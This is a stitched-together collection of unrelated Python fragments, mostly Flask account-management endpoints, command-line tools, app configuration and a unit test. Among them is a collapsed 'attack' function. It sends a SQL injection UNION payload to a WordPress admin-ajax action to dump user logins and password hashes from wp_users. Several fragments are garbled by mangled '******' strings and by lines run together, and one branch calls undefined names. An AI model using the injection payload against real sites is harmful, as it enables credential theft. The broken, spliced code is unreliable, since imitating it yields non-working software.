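def deletedUser_POST():
    """Handle POST /deletedUser: delete the account named in the JSON body.

    The body must be a JSON object with a "login" key. The response status is
    whatever ``Login.userSuppr`` returns when the login exists, 1002 when it
    does not, and 1004 (with an error body) when anything in the handler raises.
    """
    # NOTE(review): the only input is a login name taken from the request body;
    # nothing in this function proves who the caller is. Confirm that a
    # decorator or before-request hook outside this view authenticates and
    # authorizes the deletion.
    logger.info('\n/deletedUser method : POST')
    logger.info(request.data)
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        # Parse the payload sent to the server and extract the login.
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        # Explicit comparison kept: isLogin's return type is not visible here.
        if Login.isLogin(login) == True:
            resp.status_code = Login.userSuppr(login)
        else:
            # Unknown login.
            resp.status_code = 1002
    except Exception:
        # Every failure (bad JSON, missing key, backend error) is reported to
        # the client as 1004; the traceback goes to the application log rather
        # than stdout so it is not lost.
        logger.exception('/deletedUser failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp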
def attack(url): path = url + "/wp-admin/admin-ajax.php?action=get_old_table" headers = { 'content-type': 'application/x-www-form-urlencoded', 'host': 'localhost' } data = { "tableId": "1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID>=0" } print("SQL Injection attack.") username = input("Insert your username: "******"Insert your password: "******"Your login failed. Username or password wrong. Insert them again!" ) username = input("Insert your username: "******"Insert your password: "******":")
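def ModifyDescription_POST():
    """Handle POST /ModifyDescription: update a user's description and mail.

    The body must be a JSON object with "login", "description" and "mail".
    The description is updated first; the mail is updated only if that call
    returned 200. The response status is the status of the last update that
    ran, or 1004 (with an error body) when anything in the handler raises.
    """
    # NOTE(review): the login comes from the request body and is not checked
    # against any credential in this function. Confirm the caller is
    # authenticated elsewhere before profile data is changed.
    logger.info('\n/ModifyDescription method : POST')
    logger.info(request.data)
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        resp.status_code = 200
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        desc = str(req_data["description"])
        mail = str(req_data["mail"])

        # Keep the status in its own name instead of overwriting the parsed
        # request, and report it even when the first update fails.
        status = Login.descModif(login, desc)
        if status == 200:
            status = Login.mailModif(login, mail)
        resp.status_code = status
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/ModifyDescription failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
        return resp
    logger.info(resp.data)
    return resp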
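def erasePassword_POST():
    """Handle POST /erasePassword: overwrite the password of an existing login.

    The body must be a JSON object with "login" and "password". The response
    status is whatever ``Login.changePass`` returns when the login exists,
    1002 when it does not, and 1004 (with an error body) on any exception.
    """
    # NOTE(review): the new password is applied with no proof of identity
    # visible here (no current password, no reset token). Confirm that access
    # to this route is restricted elsewhere.
    logger.info('\n/erasePassword method : POST')
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        resp.status_code = 200
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        password = str(req_data["password"])
        # The raw body carries the new password, so only the login is logged.
        logger.info('/erasePassword requested for login %r', login)

        # Explicit comparison kept: isLogin's return type is not visible here.
        if Login.isLogin(login) == True:
            resp.status_code = Login.changePass(login, password)
        else:
            # Unknown login.
            resp.status_code = 1002
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/erasePassword failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp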
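def forgotPassword_POST():
    """Handle POST /forgotPassword: start the forgotten-password flow.

    The body must be a JSON object with "login" and "mail". The response
    status is whatever ``Login.forgetPassword`` returns when the login exists,
    1002 when it does not, and 1004 (with an error body) on any exception.
    """
    # NOTE(review): answering 1002 for unknown logins tells an unauthenticated
    # caller which account names exist. Consider returning the same status
    # in both cases if clients do not depend on the distinction.
    logger.info('/forgotPassword method : POST')
    logger.info(request.data)
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        # Default to 200; the branches below overwrite it.
        resp.status_code = 200
        req_data = json.loads(request.data)
        logger.info(req_data)
        login = str(req_data["login"])
        mail = str(req_data["mail"])

        # Explicit comparison kept: isLogin's return type is not visible here.
        if Login.isLogin(login) == True:
            resp.status_code = Login.forgetPassword(login, mail)
        else:
            # Unknown login.
            resp.status_code = 1002
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/forgotPassword failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp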
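def capteur_POST():
    """Handle POST /capteur: return readings of one sensor for a date range.

    The body must be a JSON object with "login", "capteurId", "mesure",
    "dateDebut" and "dateFin". On success the body is ``{"releve": [...]}``
    with status 200. Other statuses: 1002 unknown login, 1006 unknown sensor,
    1007 login has no access to the sensor, 1004 on any exception.
    """
    # NOTE(review): the access check trusts the "login" value supplied in the
    # body; no credential for that login is verified in this function.
    # Confirm the caller's identity is established elsewhere.
    logger.info('/capteur method : POST')
    logger.info(request.data)
    resp = make_response()
    addCorsHeaders(resp)

    # Measure name -> name of the Probe reader; anything else falls back to
    # Probe.capteurValue. Resolved lazily so only the selected reader is
    # looked up, as in the original if/elif chain.
    readers = {
        "temperature": "temperatureValue",
        "ozone": "ozoneValue",
        "hygrometrie": "hygrometrieValue",
        "humidite": "humiditeValue",
    }
    try:
        result = {}
        resp.headers['Content-Type'] = 'application/json'
        req_data = json.loads(request.data)
        logger.info(req_data)
        login = str(req_data["login"])
        capteurId = str(req_data["capteurId"])
        mesure = str(req_data["mesure"])
        dateDebut = req_data["dateDebut"]
        dateFin = req_data["dateFin"]

        # Guard clauses replace the three nested ifs; each failure keeps its
        # original status code. Explicit comparisons with True are kept
        # because the helpers' return types are not visible here.
        if Login.isLogin(login) != True:
            resp.status_code = 1002
            return resp
        if Probe.isBalise(capteurId) != True:
            resp.status_code = 1006
            return resp
        if Login.userAccess(login, capteurId) != True:
            resp.status_code = 1007
            return resp

        read = getattr(Probe, readers.get(mesure, "capteurValue"))
        result["releve"] = read(login, capteurId, dateDebut, dateFin)
        resp.data = json.dumps(result)
        resp.status_code = 200
        logger.info(resp.data)
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/capteur failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp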
def performLogin(url): username = input("\nInsert your username: "******"Insert your password: "******"\nYour login failed, Username or password are wrong, insert them again" ) username = input("Insert your username: "******"Insert your password: ") result = LoginManager.login(url, username, password)
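def main():
    """Parse command-line options and run one account or class action.

    Options: -u/--user, -p/--password, -c/--cellphone, -e/--email and
    -a/--action, each taking a value. Supported actions are "createuser",
    "loginuser" and "addclass"; any other action only opens and closes the
    database connection.
    """
    # NOTE(review): a password passed with -p/--password is visible to other
    # local users through the process list and may be kept in shell history.
    # Reading it from a prompt or from the environment avoids that.
    #
    # Each short option needs a trailing ':' to accept a value; without it
    # getopt treats -u/-p/-c/-e/-a as flags and `arg` is always empty.
    options, _ = getopt.gnu_getopt(
        sys.argv[1:], 'u:p:c:e:a:',
        ['user=', 'password=', 'cellphone=', 'email=', 'action='])

    user = "******"
    password = "******"
    cellphone = "empty_phone"
    action = "empty_action"
    email = "empty_email"
    # No option sets the next four values, so "addclass" always runs with
    # these placeholders.
    classstring = "empty_class"
    sectionfrom = "empty_section"
    sectionto = "empty_section"
    userid = "empty_userid"

    for opt, arg in options:
        if opt in ('-u', '--user'):
            user = arg
        elif opt in ('-p', '--password'):
            password = arg
        elif opt in ('-c', '--cellphone'):
            cellphone = arg
        elif opt in ('-e', '--email'):
            email = arg
        # The missing comma made this a substring test against the single
        # string '-a--action'; it is now a real two-element tuple.
        elif opt in ('-a', '--action'):
            action = arg
        else:
            print("wrong args")

    cnx = mysql_connect()
    try:
        if action == "createuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.create_user(user, password, email, cellphone))
        elif action == "loginuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.login_user(user, password))
        elif action == "addclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(discussion_manager.add_class(
                userid, classstring, sectionfrom, sectionto))
    finally:
        # Release the connection even when an action raises.
        cnx.close()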
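def login_POST():
    """Handle POST /login: check a login/password pair and return the profile.

    The body must be a JSON object with "login" and "password". Statuses:
    200 with the result of ``Login.userInfo`` when both checks pass, 1003 for
    a wrong password, 1002 for an unknown login (both with the placeholder
    profile below as body), and 1004 with an error body on any exception.
    """
    # NOTE(review): 1002 versus 1003 lets a caller tell "no such account" from
    # "wrong password", which helps account enumeration. Kept as is because
    # clients may depend on the two codes.
    logger.info('\n/login method : POST')
    resp = make_response()
    addCorsHeaders(resp)
    # Placeholder profile serialized when authentication fails.
    tmp = {"nom": "toto", "prenom": "toto", "description": "toto", "login": "******"}
    try:
        resp.headers['Content-Type'] = 'application/json'
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        password = str(req_data["password"])
        # The raw body carries the password, so only the login is logged.
        logger.info('/login attempt for login %r', login)

        # Explicit comparisons kept: the helpers' return types are not
        # visible here.
        if Login.isLogin(login) == True:
            if Login.isPass(login, password) == True:
                resp.status_code = 200
                tmp = Login.userInfo(login)
            else:
                # Wrong password.
                resp.status_code = 1003
        else:
            # Unknown login.
            resp.status_code = 1002

        resp.data = json.dumps(tmp)
        logger.info(resp.data)
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/login failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp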
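def user_POST():
    """Handle POST /user: create a new account.

    The body must be a JSON object with "login", "password", "nom", "prenom",
    "mail" and "description". The response status is whatever
    ``Login.insertUser`` returns when the login is free, 1005 when it is
    already taken, and 1004 (with an error body) on any exception.
    """
    # NOTE(review): the password is handed to Login.insertUser as received.
    # Confirm that it is hashed with a password-hashing function before it
    # is stored.
    logger.info('/user method : POST')
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        password = str(req_data["password"])
        nom = str(req_data["nom"])
        prenom = str(req_data["prenom"])
        mail = str(req_data["mail"])
        desc = str(req_data["description"])
        # Both the raw body and the parsed payload carry the password, so
        # only the login is logged.
        logger.info('/user registration requested for login %r', login)

        # Explicit comparison kept: isLogin's return type is not visible here.
        if Login.isLogin(login) == False:
            resp.status_code = Login.insertUser(
                login, password, nom, prenom, desc, mail)
        else:
            # Login already exists.
            resp.status_code = 1005
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/user failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp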
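def modifyPassword_POST():
    """Handle POST /modifyPassword: change a password after checking the old one.

    The body must be a JSON object with "login", "ancienPassword" and
    "newPassword". Statuses: the value returned by ``Login.changePass`` when
    the login exists and the old password matches, 1003 for a wrong old
    password, 1002 for an unknown login, 1004 with an error body on any
    exception.
    """
    logger.info('/modifyPassword method : POST')
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        # Default to 200; the branches below overwrite it.
        resp.status_code = 200
        req_data = json.loads(request.data)
        login = str(req_data["login"])
        aPassword = str(req_data["ancienPassword"])
        nPassword = str(req_data["newPassword"])
        # The body carries the old and the new password, so only the login
        # is logged.
        logger.info('/modifyPassword requested for login %r', login)

        # Explicit comparisons kept: the helpers' return types are not
        # visible here.
        if Login.isLogin(login) == True:
            if Login.isPass(login, aPassword) == True:
                # Report the outcome of the change instead of discarding it;
                # a failed update used to be answered with 200.
                resp.status_code = Login.changePass(login, nPassword)
            else:
                # Wrong current password.
                resp.status_code = 1003
        else:
            # Unknown login.
            resp.status_code = 1002
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/modifyPassword failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
    return resp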
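def userlist_GET():
    """Handle GET /userList: return the result of ``Login.userList`` as JSON.

    Status is 200 on success and 1004 (with an error body) when the lookup or
    the serialization raises.
    """
    # NOTE(review): the full user list is returned with no check on the caller
    # visible in this function. Confirm the route is protected elsewhere.
    logger.info('\n/userList method : GET')
    resp = make_response()
    addCorsHeaders(resp)
    try:
        resp.headers['Content-Type'] = 'application/json'
        resp.status_code = 200
        users = Login.userList()
        resp.data = json.dumps(users)
    except Exception:
        # Traceback goes to the application log rather than stdout.
        logger.exception('/userList failed')
        resp.status_code = 1004
        resp.data = "error 1004 : Bad format json"
        return resp
    logger.info(resp.data)
    return resp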
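from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager


################
#### config ####
################

# Settings are read from flask.cfg in the instance folder
# (instance_relative_config=True).
app = Flask(__name__, instance_relative_config=True)
app.config.from_pyfile('flask.cfg')

db = SQLAlchemy(app)

login_manager = LoginManager()
login_manager.init_app(app)
# Endpoint that unauthenticated users are redirected to.
login_manager.login_view = "users.login"

# Imported after `db` exists; presumably project.models needs it (confirm).
from project.models import User


@login_manager.user_loader
def load_user(user_id):
    """Return the User for the id stored in the session, or None.

    Flask-Login expects None, not an exception, when the id is invalid, so a
    non-numeric id is treated as "no such user" instead of raising.
    """
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return None
    return User.query.filter(User.id == numeric_id).first()


####################
#### blueprints ####
####################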
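import os
import logging
from logging.handlers import RotatingFileHandler

from flask import Flask
# The extension modules are imported with underscores; a hyphenated module
# name is a syntax error.
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_migrate import Migrate
from flask_bootstrap import Bootstrap

from config import Config

app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
login = LoginManager(app)
migrate = Migrate(app, db)
# View that unauthenticated users are redirected to.
login.login_view = 'login'

if not app.debug:
    # exist_ok avoids the check-then-create race of exists() + mkdir().
    os.makedirs('logs', exist_ok=True)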
from LoginManager import *

''' .. ---------------------------------------------------------------------- Ran 2 tests in 0.001s OK '''

# Module-level fixtures: three PasswordManager/LoginManager pairs created once
# at import time and shared by the tests below.
passwordManagerOne = PasswordManager()
loginManagerOne = LoginManager(passwordManagerOne)
passwordManagerTwo = PasswordManager()
loginManagerTwo = LoginManager(passwordManagerTwo)
passwordManagerThree = PasswordManager()
loginManagerThree = LoginManager(passwordManagerThree)


class LoginManagerTest(unittest.TestCase):
    """Tests for the password getters of the shared PasswordManager fixtures."""

    # No assignment to these names appears in the visible class body, so this
    # declaration has no effect on the lines shown here.
    global loginManagerOne, loginManagerTwo, loginManagerThree, passwordManagerOne, passwordManagerTwo, passwordManagerThree

    def test_gettingPasswords(self):
        """A fresh PasswordManager reports "password" for database and FTP."""
        # NOTE(review): the expected value suggests PasswordManager ships with
        # a default credential of "password"; confirm this is a test fixture
        # and not a production default.
        self.assertEqual(passwordManagerOne.getDatabasePassword(), "password")
        self.assertEqual(passwordManagerOne.getFtpPassword(), "password")
resp = s.recv(1024) if resp != b"Accept": s.close() sys.exit(0) def sendToServer(plaintext): """Function to send message with signature to server""" signature = keys.signUsingPrivateKey(plaintext) encryptedText = keys.encrypt(plaintext, serverSessionKey) s.send(encryptedText) time.sleep(1) s.send(signature) # Creates log-in manager login = lm.LoginManager() currentUser = None # Loop infinitely until user is logged into the system while True: cmd = input("What would you like to do? [R] for register, [L] for login, [Q] for quit. \n") # Quitting program if cmd.upper() == "Q": print("Exiting, goodbye!") s.send(b"Close") s.close() sys.exit(0) # Sending registration request with digital signature elif cmd.upper() == "R":
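import os

from flask import Flask, flash, render_template, request, redirect, url_for, make_response
from flask_pymongo import PyMongo
from flask_wtf import FlaskForm
from wtforms import StringField, validators
from flask_login import LoginManager

mongo = PyMongo()
login_manager = LoginManager()

app = Flask(__name__)
# The connection string (which embeds the database user's password) and the
# session-signing key are read from the environment instead of being written
# into the source. Credentials that were committed here should be rotated.
# A missing variable raises KeyError at start-up, so the app never runs with
# a guessable key.
app.config['MONGO_URI'] = os.environ['MONGO_URI']
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']

login_manager.init_app(app)
mongo.init_app(app)

client = mongo.cx
db = client.beta_db
comments = db.comments
comment = 'Submit YES to get started.'


class LoginForm(FlaskForm):
    """Login form with a single required "username" field."""

    name = StringField('username', validators=[validators.DataRequired()])


@app.route('/login', methods=['GET', 'POST'])
def login():
    """Validate the login form and redirect to the index view on success."""
    form = LoginForm()
    if form.validate_on_submit():
        # NOTE(review): login_user() is commented out and the form has no
        # password field, so no credential is checked and no user session is
        # established on this path.
        # login_user(user)
        flash('Loggin in successfully.')
        return redirect(url_for('index'))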
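def main():
    """Parse command-line options and run one user, class or team action.

    Options -u/--user, -p/--password, -c/--cellphone, -e/--email and
    -a/--action have short and long forms; --userid, --classstring,
    --sectionfrom, --sectionto, --leader, --teamname, --section, --remain and
    --desc are long-only. Supported actions: "createuser", "loginuser",
    "addclass", "removeclass", "getjson", "raiseTeam", "joinTeam".

    Database settings are read from the environment variables GJ_DB_USER,
    GJ_DB_PASSWORD, GJ_DB_HOST and, optionally, GJ_DB_NAME (these variable
    names are introduced by this function).
    """
    import os

    # NOTE(review): a password passed with -p/--password is visible to other
    # local users through the process list and may be kept in shell history.
    #
    # Each short option needs a trailing ':' to accept a value.
    options, _ = getopt.gnu_getopt(
        sys.argv[1:], 'u:p:c:e:a:',
        ['user=', 'password=', 'cellphone=', 'email=', 'classstring=',
         'sectionfrom=', 'sectionto=', 'userid=', 'action=', 'leader=',
         'teamname=', 'section=', 'remain=', 'desc='])

    user = "******"
    password = "******"
    cellphone = "empty_phone"
    action = "empty_action"
    email = "empty_email"
    classstring = "empty_class"
    sectionfrom = "empty_section"
    sectionto = "empty_section"
    userid = "empty_userid"
    leader = "empty_leader"
    teamname = "empty_teamname"
    section = "empty_section"
    remain = "empty_remain"
    desc = "empty_remain"

    for opt, arg in options:
        if opt in ('-u', '--user'):
            user = arg
        elif opt in ('-p', '--password'):
            password = arg
        elif opt in ('-c', '--cellphone'):
            cellphone = arg
        elif opt in ('-e', '--email'):
            email = arg
        # `opt in ('--userid')` tested for a substring of one string; the
        # long-only options are now compared for equality.
        elif opt == '--userid':
            userid = arg
        elif opt == '--classstring':
            classstring = arg
        elif opt == '--sectionfrom':
            sectionfrom = arg
        elif opt == '--sectionto':
            sectionto = arg
        elif opt in ('-a', '--action'):
            action = arg
        elif opt == '--leader':
            leader = arg
        elif opt == '--teamname':
            teamname = arg
        # Was spelled '--sction', so --section could never be set.
        elif opt == '--section':
            section = arg
        elif opt == '--remain':
            remain = arg
        elif opt == '--desc':
            desc = arg
        else:
            print("wrong args")

    # The database user, password and host are no longer written into the
    # source; credentials that were committed here should be rotated.
    required = ("GJ_DB_USER", "GJ_DB_PASSWORD", "GJ_DB_HOST")
    missing = [name for name in required if not os.environ.get(name)]
    if missing:
        sys.exit("missing database settings: " + ", ".join(missing))
    sqlconnector = MysqlConnector.mysqlconnector(
        os.environ["GJ_DB_USER"],
        os.environ["GJ_DB_PASSWORD"],
        os.environ["GJ_DB_HOST"],
        os.environ.get("GJ_DB_NAME", "GJ_TEST_DB"))
    cnx = sqlconnector.mysql_connect()

    try:
        if action == "createuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.create_user(user, password, email, cellphone))
        elif action == "loginuser":
            login_manager = LoginManager.loginManager(cnx)
            print(login_manager.login_user(user, password))
        elif action == "addclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(discussion_manager.add_class(
                userid, classstring, sectionfrom, sectionto))
        elif action == "removeclass":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            print(discussion_manager.remove_class(userid, classstring))
        elif action == "getjson":
            discussion_manager = DiscussionManager.discussionManager(cnx)
            discussion_manager.getJSON(userid)
        elif action == "raiseTeam":
            # NOTE(review): "TeanManager" looks like a misspelling of the
            # module name; confirm against the file's imports.
            team_manager = TeanManager.teamManager(cnx)
            print(team_manager.raise_team(
                leader, teamname, classstring, section, remain, desc))
        elif action == "joinTeam":
            team_manager = TeanManager.teamManager(cnx)
            # NOTE(review): `username` is not defined in this function and
            # `team_manager` is never used; this branch presumably should call
            # a method on team_manager with `user`. Confirm and fix.
            print(join_teams(username, teamname, classstring, section))
    finally:
        # Release the connection even when an action raises.
        cnx.close()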